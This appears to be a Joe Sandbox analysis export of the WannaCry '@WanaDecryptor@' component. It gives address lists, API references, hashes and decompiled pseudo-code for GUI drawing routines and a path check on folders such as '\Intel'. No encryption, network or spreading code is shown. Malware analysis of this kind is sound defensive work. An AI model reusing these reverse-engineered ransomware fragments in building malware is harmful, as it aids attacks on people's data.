0x0040916e
0x00409177
0x00409177
0x0040917f
0x0040917f
0x00409163
0x004091c8
0x004091cf
0x0040970a
0x0040970e
0x00409719
0x00000000
0x004091d5
0x004091dd
0x004091e4
0x004091e9
0x004091eb
0x004091ef
0x004091fb
0x00409203
0x00409208
0x00409215
0x0040921d
0x00409225
0x0040922d
0x00409235
0x0040923e
0x00409246
0x0040924e
0x00409256
0x00409259
0x00409260
0x00409264
0x0040926b
0x0040926f
0x00409277
0x00409282
0x0040928d
0x00409292
0x00409296
0x0040929d
0x004092a1
0x004092a5
0x004092ad
0x004092b8
0x004092c0
0x004092c5
0x004092c9
0x004092d9
0x004092e1
0x004092f3
0x004092f7
0x004092fb
0x00409308
0x0040930d
0x0040930e
0x0040930f
0x00409317
0x0040931c
0x0040931f
0x00409323
0x00409327
0x00409337
0x00409355
0x00409357
0x00409357
0x0040935b
0x0040935f
0x00409363
0x0040936f
0x0040937b
0x00409381
0x00409389
0x004093a4
0x004093bd
0x004093de
0x00000000
0x00000000
0x004093e0
0x004093e8
0x004093ec
0x004093f0
0x004093f2
0x004093f2
0x00000000
0x004093f2
0x004093bf
0x004093c7
0x004093cb
0x004093cf
0x004093d3
0x00000000
0x004093d3
0x004093a6
0x004093ae
0x004093b2
0x00000000
0x0040938b
0x0040938f
0x00409393
0x00409397
0x0040939b
0x004093f6
0x004093ff
0x0040940b
0x004094b9
0x004094cc
0x004094d5
0x004094e8
0x004094f3
0x00409517
0x00409525
0x00409537
0x00409537
0x0040953d
0x00409553
0x0040955d
0x00409568
0x0040956a
0x0040956a
0x0040956e
0x00409572
0x00409579
0x00409580
0x0040958e
0x0040959b
0x004095ad
0x004095ad
0x004095bf
0x0040961a
0x0040962d
0x00409634
0x0040963c
0x00409641
0x00409649
0x0040964d
0x00409658
0x0040965a
0x0040965d
0x0040965d
0x00409662
0x0040966d
0x00409671
0x0040967b
0x0040967d
0x00409680
0x00409680
0x00409685
0x0040968d
0x00409691
0x0040969c
0x004096a3
0x004096a3
0x004096a6
0x004096ae
0x004096b2
0x004096bc
0x004096c5
0x004096c5
0x004096cc
0x004096d4
0x004096d9
0x004096dd
0x004096e5
0x004096ed
0x004096f5
0x004096fa
0x00409702
0x00000000
0x004095c1
0x004095c9
0x004095d1
0x004095d3
0x004095d3
0x004095e0
0x004095eb
0x004095ef
0x004095fc
0x00409604
0x00409608
0x0040960a
0x0040960b
0x0040960c
0x00409610
0x00409614
0x00000000
0x00409614
0x004095bf
0x0040950c
0x00000000
0x0040950c
0x00409421
0x0040942c
0x00409430
0x00409432
0x00409432
0x00409444
0x00000000
0x0040944a
0x0040945c
0x0040945f
0x00409467
0x00409478
0x0040948e
0x00409491
0x0040949b
0x0040949c
0x004094a3
0x00000000
0x004094a3
0x00409444
0x00409389

APIs

#540.MFC42 ref: 00409137
#3874.MFC42(?), ref: 0040914A
#860.MFC42(004213A4,?), ref: 00409177
#860.MFC42(%d%%,?), ref: 00409197
_ftol.MSVCRT ref: 004091BF
SendMessageA.USER32(?,00000031,00000000,00000000), ref: 004091DD
#2860.MFC42(00000000), ref: 004091E4
#5875.MFC42(00000001), ref: 0040928D
#6170.MFC42(0000000E,00000001), ref: 004092C0
GetWindowOrgEx.GDI32(?,?,0000000E,00000001), ref: 004092E1
#540.MFC42 ref: 004092FB
#2818.MFC42(?,00000000,?), ref: 00409317
GetObjectA.GDI32(?,0000003C,?), ref: 00409337
GetTextExtentPoint32A.GDI32(?,?,?,?), ref: 0040937B
GetViewportOrgEx.GDI32(?,?), ref: 004093FF
#800.MFC42 ref: 0040963C
#6170.MFC42(?), ref: 0040965D
#5875.MFC42(?), ref: 00409680
#2414.MFC42 ref: 004096D4
#2414.MFC42 ref: 004096F5
#800.MFC42 ref: 00409719

Strings

[A, xrefs: 004096FA
tgA, xrefs: 00409282
xgA, xrefs: 00409685
pgA, xrefs: 00409641
tgA, xrefs: 00409662
xgA, xrefs: 0040924E
|gA, xrefs: 004096A6
%d%%, xrefs: 0040918E
|gA, xrefs: 00409225
gfff, xrefs: 00409344
pgA, xrefs: 004092B8

Memory Dump Source

Source File: 0000001B.00000002.5854333958.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 0000001B.00000002.5854243846.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000001B.00000002.5854674595.0000000000415000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000001B.00000002.5854906249.000000000041F000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 0000001B.00000002.5855003170.0000000000421000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000001B.00000002.5855085880.0000000000423000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_400000_@WanaDecryptor@.jbxd

Yara matches

Similarity

API ID: #2414#540#5875#6170#800#860$#2818#2860#3874ExtentMessageObjectPoint32SendTextViewportWindow_ftol
String ID: %d%%$gfff$pgA$pgA$tgA$tgA$xgA$xgA$|gA$|gA$[A
API String ID: 2923375784-3599407550
Opcode ID: 7e6b703d67e7595773a4bd55965276fd3caf6c6c14634650179ea244f19e8907
Instruction ID: e7c60e05cab477c723c52aa9b6021990c4bcf2d63edfa6d200c8e4e6b3644932
Opcode Fuzzy Hash: 7e6b703d67e7595773a4bd55965276fd3caf6c6c14634650179ea244f19e8907
Instruction Fuzzy Hash: D312E2B0208381DFD714CF69C484A9BBBE5BBC8304F148A2EF89997391D774E945CB66

Uniqueness

Uniqueness Score: -1.00%

Function 00405230 Relevance: 49.8, APIs: 33, Instructions: 279
COMMON

Download Yara Rule

C-Code - Quality: 72%

			E00405230(void* __ecx) {
				RECT* _v12;
				char _v20;
				char _v24;
				char _v28;
				char _v32;
				char _v36;
				char _v40;
				intOrPtr _v44;
				char _v48;
				char _v52;
				void* _v56;
				void* _v60;
				void* _v64;
				void* _v68;
				int _t98;
				int _t99;
				int _t104;
				char* _t106;
				void* _t109;
				char* _t110;
				signed int _t113;
				int _t114;
				void* _t117;
				char* _t118;
				char _t119;
				char* _t120;
				signed int _t122;
				void* _t123;
				int _t126;
				int _t127;
				int _t130;
				void* _t132;
				signed int _t136;
				signed int _t142;
				intOrPtr _t163;
				intOrPtr _t179;
				signed int _t182;
				signed int _t198;
				void* _t199;
				signed int _t200;
				void* _t201;
				intOrPtr* _t205;
				void* _t208;
				intOrPtr* _t212;
				intOrPtr* _t213;
				intOrPtr _t215;

				_push(0xffffffff);
				_push(E00413918);
				_push( *[fs:0x0]);
				 *[fs:0x0] = _t215;
				_t208 = __ecx;
				_t182 =  *(__ecx + 0x70);
				if(_t182 != 1) {
					if(__eflags <= 0) {
						L33:
						_t98 = InvalidateRect( *(_t208 + 0x20), 0, 1);
						L34:
						 *[fs:0x0] = _v12;
						return _t98;
					}
					__eflags =  *((char*)(__ecx + 0x4b)) - 1;
					if( *((char*)(__ecx + 0x4b)) != 1) {
						L15:
						_t99 =  *(_t208 + 0x78);
						__eflags = _t99 - 3;
						if(_t99 != 3) {
							__eflags = _t99 - 2;
							if(_t99 != 2) {
								__eflags = _t99;
								if(_t99 != 0) {
									__eflags = _t99 - 1;
									if(_t99 != 1) {
										goto L33;
									}
									_t212 = _t208 + 0x44;
									_t198 =  *( *((intOrPtr*)(_t208 + 0x44)) - 8);
									_t136 =  *(_t208 + 0x74);
									asm("cdq");
									_t98 = _t198 / _t136;
									__eflags = _t98;
									if(_t98 == 0) {
										goto L34;
									}
									__eflags = _t198 - _t136;
									if(_t198 < _t136) {
										goto L34;
									}
									_t199 = 0;
									__eflags = _t98;
									if(_t98 <= 0) {
										goto L33;
									}
									_t126 = _t98;
									do {
										_push( *((intOrPtr*)(_t136 + _t199 +  *_t212 - 1)));
										_push(_t199);
										L00412E12();
										_push(1);
										_push( *(_t208 + 0x74) + _t199);
										L00412E0C();
										_t136 =  *(_t208 + 0x74);
										_t199 = _t199 + _t136;
										_t126 = _t126 - 1;
										__eflags = _t126;
									} while (_t126 != 0);
									goto L33;
								}
								_t213 = _t208 + 0x44;
								_t142 =  *(_t208 + 0x74);
								_t200 =  *( *((intOrPtr*)(_t208 + 0x44)) - 8);
								asm("cdq");
								_t104 = _t200 / _t142;
								__eflags = _t104;
								if(_t104 == 0) {
									L22:
									_t104 = 1;
									L23:
									_t201 = 0;
									__eflags = _t104;
									if(_t104 <= 0) {
										goto L33;
									}
									_t127 = _t104;
									do {
										_push( *((intOrPtr*)(_t201 +  *_t213)));
										_push(_t142 + _t201);
										L00412E12();
										_push(1);
										_push(_t201);
										L00412E0C();
										_t142 =  *(_t208 + 0x74);
										_t201 = _t201 + _t142;
										_t127 = _t127 - 1;
										__eflags = _t127;
									} while (_t127 != 0);
									goto L33;
								}
								__eflags = _t200 - _t142;
								if(_t200 >= _t142) {
									goto L23;
								}
								goto L22;
							}
							_t106 =  &_v32;
							_push( *(_t208 + 0x74));
							_push(_t106);
							L00412E24();
							_push( *(_t208 + 0x74));
							_push( &_v24);
							_v12 = 8;
							L00412E30();
							_push( &_v48);
							_push(_t106);
							_push( &_v36);
							_v20 = 9;
							L00412E18();
							_push(_t106);
							_v32 = 0xa;
							L00412D9A();
							_v36 = 9;
							L00412CC2();
							_v36 = 8;
							L00412CC2();
							_v36 = 0xffffffff;
							L00412CC2();
							goto L33;
						}
						_push( *(_t208 + 0x74));
						_push( &_v36);
						L00412E1E();
						_v12 = 5;
						_t109 =  *( *((intOrPtr*)(_t208 + 0x44)) - 8) -  *(_t208 + 0x74);
						_push(_t109);
						_push( &_v36);
						L00412E24();
						_push(_t109);
						_t110 =  &_v52;
						_push(_t110);
						_push( &_v40);
						_v20 = 6;
						L00412E18();
						_push(_t110);
						_v32 = 7;
						L00412D9A();
						_v36 = 6;
						L00412CC2();
						_v36 = 5;
						L00412CC2();
						_v36 = 0xffffffff;
						L00412CC2();
						goto L33;
					}
					_t163 =  *((intOrPtr*)( *((intOrPtr*)(__ecx + 0x44)) - 8));
					_t113 =  *(__ecx + 0x74) * _t182;
					__eflags = _t163 - _t113;
					if(_t163 >= _t113) {
						goto L15;
					}
					_t114 = _t113 - _t163;
					__eflags = _t114;
					if(_t114 <= 0) {
						goto L15;
					}
					_t130 = _t114;
					do {
						_push( *((intOrPtr*)(__ecx + 0x40)));
						L00412E36();
						_t130 = _t130 - 1;
						__eflags = _t130;
					} while (_t130 != 0);
					goto L15;
				}
				if( *((intOrPtr*)(__ecx + 0x4b)) != _t182) {
					L6:
					_t205 = _t208 + 0x44;
					if( *(_t208 + 0x78) != 0) {
						_t117 =  *((intOrPtr*)( *_t205 - 8)) - 1;
						_push(_t117);
						_push( &_v36);
						L00412E24();
						_t118 =  &_v36;
						_push(1);
						_push(_t118);
						_v12 = 2;
						L00412E1E();
						_push(_t117);
						_push(_t118);
						_push( &_v40);
						_v20 = 3;
						L00412E18();
						_push(_t118);
						_v32 = 4;
						L00412D9A();
						_v36 = 3;
						L00412CC2();
						_v36 = 2;
						L00412CC2();
						_v36 = 0xffffffff;
						L00412CC2();
					} else {
						_push(1);
						_push( &_v24);
						_t119 =  *((intOrPtr*)( *_t205));
						_v36 = _t119;
						L00412E30();
						_v12 = 0;
						_push(_v44);
						_push(_t119);
						_t120 =  &_v36;
						_push(_t120);
						L00412E2A();
						_push(_t120);
						_v24 = 1;
						L00412D9A();
						_v28 = 0;
						L00412CC2();
						_v28 = 0xffffffff;
						L00412CC2();
					}
					goto L33;
				}
				_t179 =  *((intOrPtr*)( *((intOrPtr*)(__ecx + 0x44)) - 8));
				_t122 =  *(__ecx + 0x74);
				if(_t179 >= _t122) {
					goto L6;
				}
				_t123 = _t122 - _t179;
				if(_t123 <= 0) {
					goto L6;
				}
				_t132 = _t123;
				do {
					_push( *((intOrPtr*)(__ecx + 0x40)));
					L00412E36();
					_t132 = _t132 - 1;
				} while (_t132 != 0);
				goto L6;
			}

0x00405236
0x00405238
0x0040523d
0x0040523e
0x0040524b
0x0040524e
0x00405254
0x00405369
0x00405552
0x0040555a
0x00405560
0x00405568
0x00405572
0x00405572
0x0040536f
0x00405373
0x0040539e
0x0040539e
0x004053a1
0x004053a4
0x00405430
0x00405433
0x004054b4
0x004054b6
0x00405503
0x00405506
0x00000000
0x00000000
0x0040550b
0x0040550e
0x00405511
0x00405516
0x00405517
0x00405519
0x0040551b
0x00000000
0x00000000
0x0040551d
0x0040551f
0x00000000
0x00000000
0x00405521
0x00405523
0x00405525
0x00000000
0x00000000
0x00405527
0x00405529
0x00405534
0x00405535
0x00405536
0x0040553e
0x00405542
0x00405545
0x0040554a
0x0040554d
0x0040554f
0x0040554f
0x0040554f
0x00000000
0x00405529
0x004054bb
0x004054be
0x004054c1
0x004054c6
0x004054c7
0x004054c9
0x004054cb
0x004054d1
0x004054d1
0x004054d6
0x004054d6
0x004054d8
0x004054da
0x00000000
0x00000000
0x004054dc
0x004054de
0x004054e6
0x004054e7
0x004054ea
0x004054ef
0x004054f1
0x004054f4
0x004054f9
0x004054fc
0x004054fe
0x004054fe
0x004054fe
0x00000000
0x00405501
0x004054cd
0x004054cf
0x00000000
0x00000000
0x00000000
0x004054cf
0x0040543b
0x0040543f
0x00405440
0x00405443
0x0040544f
0x00405450
0x00405453
0x0040545b
0x00405468
0x0040546b
0x0040546c
0x0040546d
0x00405471
0x00405476
0x00405479
0x0040547e
0x00405487
0x0040548b
0x00405494
0x00405499
0x004054a2
0x004054aa
0x00000000
0x004054aa
0x004053b4
0x004053b5
0x004053b8
0x004053c3
0x004053d1
0x004053d5
0x004053d6
0x004053d7
0x004053dc
0x004053dd
0x004053e7
0x004053e8
0x004053e9
0x004053ed
0x004053f2
0x004053f5
0x004053fa
0x00405403
0x00405407
0x00405410
0x00405415
0x0040541e
0x00405426
0x00000000
0x00405426
0x0040537b
0x00405381
0x00405384
0x00405386
0x00000000
0x00000000
0x00405388
0x0040538a
0x0040538c
0x00000000
0x00000000
0x0040538e
0x00405390
0x00405393
0x00405396
0x0040539b
0x0040539b
0x0040539b
0x00000000
0x00405390
0x0040525d
0x00405285
0x00405288
0x0040528d
0x004052f9
0x004052fa
0x004052fb
0x004052fc
0x00405303
0x00405307
0x00405309
0x0040530c
0x00405314
0x00405319
0x00405320
0x00405321
0x00405322
0x00405326
0x0040532b
0x0040532e
0x00405333
0x0040533c
0x00405340
0x00405349
0x0040534e
0x00405357
0x0040535f
0x0040528f
0x00405295
0x00405297
0x00405298
0x0040529c
0x004052a0
0x004052a9
0x004052b1
0x004052b2
0x004052b3
0x004052b7
0x004052b8
0x004052bd
0x004052c0
0x004052c5
0x004052ce
0x004052d3
0x004052dc
0x004052e4
0x004052e4
0x00000000
0x0040528d
0x00405265
0x00405268
0x0040526d
0x00000000
0x00000000
0x0040526f
0x00405273
0x00000000
0x00000000
0x00405275
0x00405277
0x0040527a
0x0040527d
0x00405282
0x00405282
0x00000000

APIs

#940.MFC42(?), ref: 0040527D
#4277.MFC42(?,00000001), ref: 004052A0
#923.MFC42(?,00000000,?), ref: 004052B8
#858.MFC42(00000000,?,00000000,?), ref: 004052C5
#800.MFC42(00000000,?,00000000,?), ref: 004052D3
#800.MFC42(00000000,?,00000000,?), ref: 004052E4
#4129.MFC42(?,?), ref: 004052FC
#5710.MFC42 ref: 00405314
#922.MFC42(?,00000000,00000000), ref: 00405326
#858.MFC42(00000000,?,00000000,00000000), ref: 00405333
#800.MFC42(00000000,?,00000000,00000000), ref: 00405340
#800.MFC42(00000000,?,00000000,00000000), ref: 0040534E
#800.MFC42(00000000,?,00000000,00000000), ref: 0040535F
#940.MFC42(?), ref: 00405396
#5710.MFC42(?,?), ref: 004053B8
#4129.MFC42(?,?,?,?), ref: 004053D7
#922.MFC42(?,?,00000000,?,?,?,?), ref: 004053ED
#858.MFC42(00000000,?,?,00000000,?,?,?,?), ref: 004053FA
#800.MFC42(00000000,?,?,00000000,?,?,?,?), ref: 00405407
#800.MFC42(00000000,?,?,00000000,?,?,?,?), ref: 00405415
#800.MFC42(00000000,?,?,00000000,?,?,?,?), ref: 00405426
#4129.MFC42(?,?), ref: 00405443
#4277.MFC42(?,?,?,?), ref: 0040545B
#922.MFC42(?,00000000,?,?,?,?,?), ref: 00405471
#858.MFC42(00000000,?,00000000,?,?,?,?,?), ref: 0040547E
#800.MFC42(00000000,?,00000000,?,?,?,?,?), ref: 0040548B
#800.MFC42(00000000,?,00000000,?,?,?,?,?), ref: 00405499
#800.MFC42(00000000,?,00000000,?,?,?,?,?), ref: 004054AA
#6778.MFC42(?,00000001), ref: 004054EA
#6648.MFC42(00000000,00000001,?,00000001), ref: 004054F4
#6778.MFC42(00000000,?), ref: 00405536
#6648.MFC42(?,00000001,00000000,?), ref: 00405545
InvalidateRect.USER32(?,00000000,00000001), ref: 0040555A

Memory Dump Source

Source File: 0000001B.00000002.5854333958.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 0000001B.00000002.5854243846.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000001B.00000002.5854674595.0000000000415000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000001B.00000002.5854906249.000000000041F000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 0000001B.00000002.5855003170.0000000000421000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000001B.00000002.5855085880.0000000000423000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_400000_@WanaDecryptor@.jbxd

Yara matches

Similarity

API ID: #800$#858$#4129#922$#4277#5710#6648#6778#940$#923InvalidateRect
String ID:
API String ID: 2121400562-0
Opcode ID: b4a9873a0028e0a5de6b54efbba54189251206de77b36b87668466cc29092242
Instruction ID: 4ea7c19ebb0ecad4eacefd8b4ebc091e45acf9db756171f3a68d6c32b1a6cadd
Opcode Fuzzy Hash: b4a9873a0028e0a5de6b54efbba54189251206de77b36b87668466cc29092242
Instruction Fuzzy Hash: A4A1B770204B81AFC714DB29C590A6FB7E6EFD4304F040A1EF596D3391D7B8E8558B66

Uniqueness

Uniqueness Score: -1.00%

Function 004086E0 Relevance: 40.6, APIs: 20, Strings: 3, Instructions: 324
windowCOMMON

Download Yara Rule

C-Code - Quality: 79%

			E004086E0(intOrPtr* __ecx, void* __ebp, signed long long __fp0) {
				struct HBRUSH__* _v8;
				char _v16;
				char _v28;
				intOrPtr _v36;
				char _v52;
				char _v76;
				char _v88;
				intOrPtr _v120;
				intOrPtr _v124;
				struct HDC__* _v128;
				signed int _v132;
				void* _v136;
				char _v144;
				signed int _v148;
				struct HBRUSH__* _v152;
				intOrPtr _v156;
				struct HBRUSH__* _v160;
				char _v164;
				void* _v168;
				long _v172;
				char _v176;
				char _v180;
				struct tagRECT _v196;
				intOrPtr _v200;
				char* _v204;
				signed int _v208;
				signed int _v212;
				char _v216;
				intOrPtr _v220;
				char _v224;
				char _v228;
				struct HBRUSH__* _v232;
				intOrPtr _v236;
				char _v240;
				intOrPtr _v244;
				intOrPtr _v248;
				struct HDC__* _v252;
				char _v256;
				struct HBRUSH__* _v260;
				struct HBRUSH__* _v264;
				char _v268;
				intOrPtr _v272;
				intOrPtr _v276;
				char _v280;
				struct HBRUSH__* _v284;
				struct HBRUSH__* _v288;
				char _v292;
				intOrPtr _v300;
				char _v324;
				signed int _t146;
				intOrPtr _t148;
				signed int _t150;
				void* _t152;
				intOrPtr _t155;
				char _t163;
				char* _t165;
				RECT* _t177;
				struct HBRUSH__* _t182;
				intOrPtr _t206;
				signed int _t276;
				intOrPtr _t277;
				intOrPtr* _t281;
				void* _t283;
				long _t284;
				intOrPtr _t286;
				intOrPtr _t291;
				signed long long _t299;
				signed long long _t301;
				signed long long _t303;

				_t299 = __fp0;
				_t283 = __ebp;
				_push(0xffffffff);
				_push(E00414055);
				_push( *[fs:0x0]);
				 *[fs:0x0] = _t286;
				_t281 = __ecx;
				_push(__ecx);
				L00412DD0();
				_v8 = 0;
				GetClientRect( *(__ecx + 0x20),  &(_v196.right));
				_v172 = SendMessageA( *(_t281 + 0x20), 0x408, 0, 0);
				_push( &_v164);
				_push( &_v168);
				L00412FFE();
				L00412E54();
				_v16 = 1;
				E00407640( &_v240);
				_v240 = 0x41675c;
				_t206 = _v120;
				_t146 = 0 | _t206 == 0x00000000;
				_v16 = 2;
				_v256 = 0x4166e0;
				_v228 =  &_v132;
				_v232 = 0;
				_v208 = _t146;
				if(_t146 == 0) {
					_v244 = _t206;
					_v248 = _v124;
					_v252 = _v128;
				} else {
					 *((intOrPtr*)(_v132 + 0x58))( &_v224);
					asm("sbb eax, eax");
					_push(CreateCompatibleDC( ~( &_v136) & _v132));
					L00412E4E();
					E00409E70( &_v252,  &_v144, _v228 - _v236, _v224 - _v232);
					_t35 =  &_v264; // 0x41675c
					_v260 = E00409F10( &_v280, _t35);
					_push(_v248);
					_push(_v252);
					_push( &_v76);
					L00412FF8();
				}
				_v16 = 3;
				_v204 =  &_v256;
				_t148 =  *((intOrPtr*)(_t281 + 0x5c));
				_t291 = _t148;
				if(_t291 == 0) {
					_push( *((intOrPtr*)(_t281 + 0x58)));
					_push( &_v196);
					L00412FF2();
				} else {
					if(_t291 != 0) {
						_t182 =  *(_t148 + 4);
					} else {
						_t182 = 0;
					}
					FillRect(_v252,  &_v196, _t182);
				}
				_push(_t281 + 0x74);
				L00412FEC();
				_t150 = _v196.top;
				if(_t150 < _v196.right.left || _t150 > _v196.bottom) {
					_v268 = 0x4166e0;
					_v28 = 5;
					if(_v220 == 0) {
						_v260 = 0;
						_v264 = 0;
					} else {
						_t153 = _v232;
						E00409F80(_v240, _v236, _v232, _v228 - _v236, _v224 - _v232,  &_v268, _v236, _t153, 0xcc0020);
						_t155 = _v276;
						if(_t155 != 0) {
							_push( *((intOrPtr*)(_t155 + 4)));
							_push(_v264);
							L00412E48();
						} else {
							_push(0);
							_push(_v264);
							L00412E48();
						}
					}
					_v28 = 4;
				} else {
					L00412FE6();
					_v212 = _t150;
					_t276 = _t150 & 0x00008000;
					_v148 = _t150 & 0x00002000;
					_v180 = 0;
					_v176 = 0;
					_v168 = 0;
					_v164 = 0;
					_v160 = 0;
					_v152 = 0;
					if((_t150 & 0x00000004) == 0) {
						_v156 = _v200 - _v208;
					} else {
						_v156 = _v196.left - _v204;
					}
					asm("fild dword [esp+0x80]");
					_push(_t283);
					_t284 = _v196.right.left;
					_t163 = _v196.top - _t284;
					_v272 = _v196.bottom - _t284;
					asm("fild dword [esp+0x10]");
					_v272 = _t163;
					asm("fild dword [esp+0x10]");
					_t301 = _t299 * st2 / st1;
					L0041304A();
					_v172 = _t163;
					if(_t276 == 0) {
						st0 = _t301;
						st0 = _t301;
					} else {
						_v272 =  *((intOrPtr*)(_t281 + 0x68)) - _t284;
						asm("fild dword [esp+0x10]");
						_t303 = _t301 * st2 / st1;
						L0041304A();
						st0 = _t303;
						st0 = _t303;
						_v180 = _t163;
					}
					_t277 =  *((intOrPtr*)(_t281 + 0x54));
					if(_t277 == 0) {
						_t165 =  &_v180;
						if(_v148 == 0) {
							_t165 =  &_v164;
						}
						 *((intOrPtr*)( *_t281 + 0xc0))( &_v216, _t165,  &_v180);
					} else {
						_t177 = E00409D40( &_v52,  &_v216,  &_v180);
						if(_t277 != 0) {
							FillRect(_v264, _t177,  *(_t277 + 4));
						} else {
							FillRect(_v264, _t177, 0);
						}
					}
					 *((intOrPtr*)( *_t281 + 0xc8))( &_v228,  &_v176,  &(_v196.top));
					_v292 = 0x4166e0;
					_v52 = 7;
					if(_v244 == 0) {
						_v284 = 0;
						_v288 = 0;
						_v52 = 6;
					} else {
						_t172 = _v256;
						E00409F80(_v264, _v260, _v256, _v252 - _v260, _v248 - _v256,  &_v292, _v260, _t172, 0xcc0020);
						_t112 =  &_v324; // 0x4166e0
						E00409F10(_t112, _v300);
						_v88 = 6;
					}
				}
				_t133 =  &_v252; // 0x41675c
				_t152 = E00409E20(_t133);
				_v28 = 0;
				L00412E3C();
				_v28 = 0xffffffff;
				L00412DB8();
				 *[fs:0x0] = _v36;
				return _t152;
			}

0x004086e0
0x004086e0
0x004086e0
0x004086e2
0x004086ed
0x004086ee
0x004086fd
0x00408700
0x00408708
0x00408718
0x0040871f
0x00408736
0x00408742
0x00408743
0x00408746
0x0040874f
0x00408758
0x00408760
0x00408765
0x0040876d
0x0040877d
0x00408789
0x00408791
0x00408795
0x00408799
0x0040879d
0x004087a1
0x0040883f
0x0040884a
0x0040884e
0x004087a7
0x004087ba
0x004087cd
0x004087d8
0x004087dd
0x00408804
0x00408809
0x0040881f
0x00408823
0x0040882b
0x0040882c
0x00408831
0x00408831
0x00408856
0x0040885e
0x00408862
0x00408865
0x00408867
0x0040888c
0x0040888d
0x00408892
0x00408869
0x00408869
0x0040886f
0x0040886b
0x0040886b
0x0040886b
0x0040887d
0x0040887d
0x0040889e
0x0040889f
0x004088a4
0x004088ae
0x00408a7d
0x00408a85
0x00408a8f
0x00408ae5
0x00408ae9
0x00408a91
0x00408a91
0x00408ab9
0x00408abe
0x00408ac4
0x00408ad8
0x00408add
0x00408ade
0x00408ac6
0x00408ac8
0x00408acd
0x00408ace
0x00408ace
0x00408ac4
0x00408aed
0x004088be
0x004088c0
0x004088c9
0x004088d0
0x004088dd
0x004088e4
0x004088e8
0x004088ec
0x004088f0
0x004088f4
0x004088f8
0x004088ff
0x0040891e
0x00408901
0x0040890b
0x0040890b
0x0040892d
0x00408934
0x00408935
0x0040893b
0x0040893d
0x00408941
0x00408945
0x00408949
0x0040894f
0x00408951
0x00408958
0x0040895c
0x0040897e
0x00408980
0x0040895e
0x00408963
0x00408967
0x0040896d
0x0040896f
0x00408974
0x00408976
0x00408978
0x00408978
0x00408982
0x00408988
0x004089d3
0x004089d7
0x004089d9
0x004089d9
0x004089ec
0x0040898a
0x0040899e
0x004089a5
0x004089c2
0x004089a7
0x004089b0
0x004089b0
0x004089a5
0x00408a05
0x00408a0b
0x00408a17
0x00408a21
0x00408a6b
0x00408a6f
0x00408a73
0x00408a23
0x00408a23
0x00408a4b
0x00408a54
0x00408a59
0x00408a5e
0x00408a5e
0x00408a21
0x00408af5
0x00408af9
0x00408b02
0x00408b09
0x00408b15
0x00408b20
0x00408b2f
0x00408b3c

APIs

#470.MFC42 ref: 00408708
GetClientRect.USER32(?,?), ref: 0040871F
SendMessageA.USER32(?,00000408,00000000,00000000), ref: 00408730
#6734.MFC42(?,?), ref: 00408746
#323.MFC42(?,?), ref: 0040874F
CreateCompatibleDC.GDI32(?), ref: 004087D2
#1640.MFC42(00000000), ref: 004087DD

Part of subcall function 00409E70: CreateCompatibleBitmap.GDI32(?,?,?), ref: 00409E85
Part of subcall function 00409E70: #1641.MFC42(00000000,?,00408809,?,?,?,00000000), ref: 00409E8E

Part of subcall function 00409F10: #5785.MFC42(?,?,00408A5E,?,?,?,?,?,?,?,?,00CC0020), ref: 00409F1D

#6194.MFC42(?,?,?,\gA,?,?,?,00000000), ref: 00408831
FillRect.USER32(?,?,?), ref: 0040887D
#2754.MFC42(?,?), ref: 00408892
#2381.MFC42(?,?,?), ref: 0040889F
#3797.MFC42(?,?,?), ref: 004088C0
_ftol.MSVCRT ref: 00408951
_ftol.MSVCRT ref: 0040896F
FillRect.USER32(?,00000000,00000000), ref: 004089B0
#640.MFC42(?,?,?), ref: 00408B09
#755.MFC42(?,?,?), ref: 00408B20

Part of subcall function 00409F80: BitBlt.GDI32(?,?,?,?,\gA,?,\gA,\gA,\gA), ref: 00409FB3

Part of subcall function 00409F10: #5785.MFC42(?,?,00408A5E,?,?,?,?,?,?,?,?,00CC0020), ref: 00409F2D

Strings

\gA, xrefs: 00408809, 00408811
fA, xrefs: 00408778
fA, xrefs: 00408A54

Memory Dump Source

Source File: 0000001B.00000002.5854333958.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 0000001B.00000002.5854243846.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000001B.00000002.5854674595.0000000000415000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000001B.00000002.5854906249.000000000041F000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 0000001B.00000002.5855003170.0000000000421000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000001B.00000002.5855085880.0000000000423000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_400000_@WanaDecryptor@.jbxd

Yara matches

Similarity

API ID: Rect$#5785CompatibleCreateFill_ftol$#1640#1641#2381#2754#323#3797#470#6194#640#6734#755BitmapClientMessageSend
String ID: \gA$fA$fA
API String ID: 1027735583-2217880857
Opcode ID: 6ed80f763e045306e10188d4e497fb721b5fce89834b9b0f8741aa09041edacc
Instruction ID: b72dd9534e9f1d52b621f8c4883ea919de29669ae4f9aefa89eb3b477b52946b
Opcode Fuzzy Hash: 6ed80f763e045306e10188d4e497fb721b5fce89834b9b0f8741aa09041edacc
Instruction Fuzzy Hash: 33D12CB16083419FC314DF25C984AAFBBE9BBC8304F508E2EF1D993291DB749949CB56

Uniqueness

Uniqueness Score: -1.00%

Function 00402AF0 Relevance: 40.4, APIs: 12, Strings: 11, Instructions: 133COMMON

Download Yara Rule

APIs

_wcsnicmp.MSVCRT ref: 00402AFF
wcsstr.MSVCRT ref: 00402B18
_wcsicmp.MSVCRT ref: 00402B39
_wcsicmp.MSVCRT ref: 00402B53
_wcsicmp.MSVCRT ref: 00402B6D

Strings

\Intel, xrefs: 00402B33
N(@, xrefs: 00402AF2, 00402AFE, 00402B17
\Program Files (x86), xrefs: 00402B9B
